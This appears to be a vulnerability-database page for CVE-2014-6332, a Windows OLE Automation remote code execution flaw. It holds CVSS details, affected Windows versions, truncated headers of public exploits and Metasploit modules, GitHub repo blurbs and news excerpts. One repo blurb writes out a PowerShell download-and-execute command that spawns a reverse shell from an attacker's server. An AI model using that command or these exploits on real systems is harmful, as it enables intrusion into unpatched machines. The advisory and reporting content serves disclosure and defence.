Published: 11/11/2014 Updated: 15/05/2019

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 978

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote malicious users to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."

Vulnerable Product	Search on Vulmon	Subscribe to Product
microsoft windows server 2008 r2
microsoft windows 7 -
microsoft windows server 2008 -
microsoft windows vista -
microsoft windows rt -
microsoft windows rt 8.1 -
microsoft windows server 2012 -
microsoft windows 8.1 -
microsoft windows server 2003 -
microsoft windows server 2012 r2
microsoft windows 8 -

This Metasploit module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332 The vulnerability affects Internet Explorer 30 until version 11 within Windows95 up to Windows 10 Powershell is required on the target machine On Internet Explorer versions using Protected Mode, the user has to manually allow powershellexe to exec ...

IBM Security AppScan versions 902 and below suffer from an OLE automation array remote code execution vulnerability ...

This Metasploit module exploits the Windows OLE automation array remote code execution vulnerability The vulnerability exists in Internet Explorer 30 until version 11 within Windows 95 up to Windows 10 ...

Microsoft HTA (HTML Application) suffers from a remote code execution vulnerability ...

//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009 cve-2014-6332 exploit twittercom/yuange75 hibaiducom/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function ...

#!/usr/bin/php <?php ########################################################## # Author : Ehsan Noreddini # E-Mail : me@ehsanninfo # Social : @prot3ct0r # Title : The World Browser Remote Code Execution # TheWorld Browser is a tiny, fast and powerful web Browser It is completely free Ther ...

#!/usr/bin/python import BaseHTTPServer, sys, socket ## # Acunetix OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: irlinkedincom/pub/naser-farhadi/85/b3b/909 # # Date: 27 Mar 2015 # Version: <=95 # Tested on: Windows 7 # Description: Acunetix Login Sequence Recorder (lsrexe) Uses CoCreateInstance API ...

#!/usr/bin/php <?php ########################################################## # Title : HTML Compiler Remote Code Execution # HTML Compiler is a program that allows you to put an entire HTML application into a standalone Windows application # Author : Ehsan Noreddini # E-Mail : me@ehsanninfo # Soc ...

<!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <pre> |--------------------------------------------------------------------------| | Title: OLE Automation Array Remote Code Execution => Pre IE11 ...

#!/usr/bin/php <?php # Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : irlinkedincom/in/rezasp # E-Mail : me[at]reza[dot]es , rezaespargham[at]gmail[dot]com # Website : ...

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Powershell ...

#!/usr/bin/php <?php # Title : Havij OLE Automation Array Remote Code Execution # Affected Versions: All Version # Founder : ITSecTeam # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : irlinkedincom/in/rezasp # E-Mail : me[at]reza[dot]es , rezaespargham[at]gmail[dot]com # Websit ...

#!/usr/bin/php <?php # Title : Internet Download Manager - OLE Automation Array Remote Code Execution # Affected Versions: All Version # Founder : InternetDownloadManager # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : irlinkedincom/in/rezasp # E-Ma ...

CVE-2014-6332 ZeroDay POC - Starts PowerShell

CVE-2014-6332 CVE-2014-6332 ZeroDay POC - Starts PowerShell

Case repo for the HTMLMTH evasion server.

HtmlmthCases Cases for HTMLMTH Report Bug · Request Feature Table of Contents About The Project Getting Started Prerequisites Installation Usage Roadmap Contributing License Contact About The Project Cases for HTMLMTH Getting Starte

Ciber espezializazioko bigarren proiektua

Repositorio hau Ciber ikasturteko T3 Zabala Gailetena da Status Egiten Table of Contents Ekoizpen gertakariak Django Web Android App Phishing Hacking Docs License Hacking Windows 7 Professional 0) Introdukzioa Hasteko windows7 makina biktima esplotatzeko CVE-2014-6332 vulnerabilitatea erabili dugu Honek internet explorerren konponente baten failo batetaz baliatzen da O

Analysis of VBS exploit CVE-2018-8174

Dissecting modern browser exploit: case study of CVE-2018-8174 Overview When this exploit first emerged in the turn of April and May it spiked my interest, since despite heavy obfuscation, the code structure seemed well organized and the vulnerability exploitation code small enough to make analysis simpler I downloaded POC from github and decided it would be a good candidate f

PoC collection

PoC Collection Index CVE-2014-4114 -- PowerPoint RCE CVE-2014-6271 -- Shell Shock CVE-2014-6332 -- VBScript RCE in IE CVE-2015-1328 -- Ubuntu local root exploit

PowerShell Reverse HTTP(s) Shell

powersh-rat ======= PowerShell Reverse HTTP(s) Shell Invoke PoshRatps1 On An A server you control Requires Admin rights to listen on ports To Spawn The Reverse Shell Run On Client iex (New-Object NetWebClient)DownloadString("server/connect") [OR] Browse to or send link to server/apphta [OR] For CVE-2014-6332 Send link to server/app

zenscrawler - webcrawler written in python Sample output zen@intel:~/Desktop/spider$ time /mainpy Processing links:

PowerShell Reverse HTTPs Shell

PoshRat PowerShell Reverse HTTP(s) Shell Invoke PoshRatps1 On An A server you control Requires Admin rights to listen on ports To Spawn The Reverse Shell Run On Client iex (New-Object NetWebClient)DownloadString("server/connect") [OR] Browse to or send link to server/apphta [OR] For CVE-2014-6332 Send link to server/apphtml Creat

MSFT SFB URI Vulnerability Report

MSFT SFB URI Vulnerability Report Report date: October, 2018 Summary A vulnerability exists in the Skype Meetings App executable (Skype Meetings Appexe) Microsoft SmartScreen and potentially other security features are circumvented The vulnerability is exploited by launching a target website via the Skype for Business URI (sfb://) Skype Meetings Appexe uses Internet Explor

Analyzing Rig Exploit Kit

初めての Rig Exploit Kit リーディングこの記事は@nao_sec(@kkrnt, @PINKSAWTOOTH)が2017-05-15に公開しました書かれている内容について, 著者は一切の責任を負いませんはじめに私がDrive-by Download攻撃について趣味で調べ始めてから3ヶ月が経ちましたそれまでは攻撃の概要をぼんやりと知って

Delving deep into VBScript

Securelist • Boris Larin • 03 Jul 2018

In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object. But whereas CVE-2014-6332 was aimed at...

Securelist • Vladislav Stolyarov Boris Larin Anton Ivanov • 09 May 2018

In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174. Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by sever...

Securelist • Roman Unuchek Fedor Sinitsyn Denis Parinov Vladislav Stolyarov • 22 May 2017

According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world. 79,209,775 unique URLs were recognized as malicious by web antivirus components. Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers. Crypto ransomware attacks were blocked on 240,799 computers of unique users. Kaspersky Lab’s file antivirus det...

The Register • Darren Pauli • 11 Dec 2015

Net menaces show warped sense of humour in attack on Grauniad story

Hackers have hosed an article published by The Guardian using the world's nastiest exploit kit Angler to pop the machines of exposed readers. The attack firmly answers the article's headline positing the question 'is cybercrime out of control', based on arguments in a book by one Misha Glenny. Angler is the most capable and prolific exploit kit in use by criminals. It allows attackers to run choice cuts of the latest Flash, Java, and browser exploits through which un=patched users can be targete...

The Spring Dragon APT

Securelist • Kurt Baumgartner • 17 Jun 2015

Let’s examine a couple of interesting delivery techniques from an APT active for the past several years, the Spring Dragon APT. A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label “the Lotus Blossom Operation“, likely named for the debug string present in much of the “Elise” codebase since at least 2012: “d:\lstudio\projects\lotus\…”. The group’s capabilities are more than the much discussed CVE-2012-0158 ex...

The Register • Darren Pauli • 12 Jun 2015

Multiple rival researchers warn of Cryptowall delivery ruse targeting employers

Security researchers are focussing their crosshairs on what appears to be high-volume spam and exploit campaigns to deliver the latest iteration of the Cryptowall ransomware. Boffins from the SANS Institute, Cisco, and MalwareBytes have identified a dangerous if goofy spam campaign slinging the nasty ransomware masquerading as file attachment bearing a résumé. SANS handler Brad Duncan says the two campaigns to foist Cryptowall 3.0, also known as Croti, appear to be the handiwork of one attacke...

Securelist • Vasily Davydov Anton Ivanov Dmitry Vinogradov • 22 Apr 2015

One of the most important features of a malicious attack is its ability to conceal itself from both protection solutions and victims. The main role in performing a hidden attack is played by exploits to software vulnerabilities that can be used to secretly download malicious code on the victim machine. Generally, exploits are distributed in exploit packs which appear in the form of plugin detects (to identify the type and version of software installed on the user computer) and a set of exploits,...

The Register • Darren Pauli • 26 Nov 2014

Playboy ploy not beneath APT3

Sysadmins who have not yet patched their Windows boxes against the 18-year-old "unicorn-like" OLE bug disclosed last month could expect a deluge of spear phishing smut from a group once confined to lofty targeted zero-day attacks. The talented APT3 group was behind widespread zero-day attacks code-named Clandestine Fox earlier this year and was now targeting recently patched Windows vulnerabilities, according to FireEye researchers. That group had begun spewing spear-phishing emails targeting tw...

The Register • Darren Pauli • 12 Nov 2014

We will all remember the 11th of November

Security researcher Robert Freeman has discovered an 18-year-old, critical, remotely-exploitable vulnerability di tutti vulnerabiliti which affects just about ALL versions of Windows - all the way back to Windows 95. The vulnerability (CVE-2014-6332) rated a critical score of 9.3 in all versions of Windows and was described as a rare "unicorn-like" bug in Internet Explorer-dependent code that opens avenues for man in the middle attacks. The bug bypasses Redmond's lauded Enhanced Mitigation Exper...

Get Started

CVE-2014-6332

Vulnerability Summary

Vulnerability Trend

Exploits

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect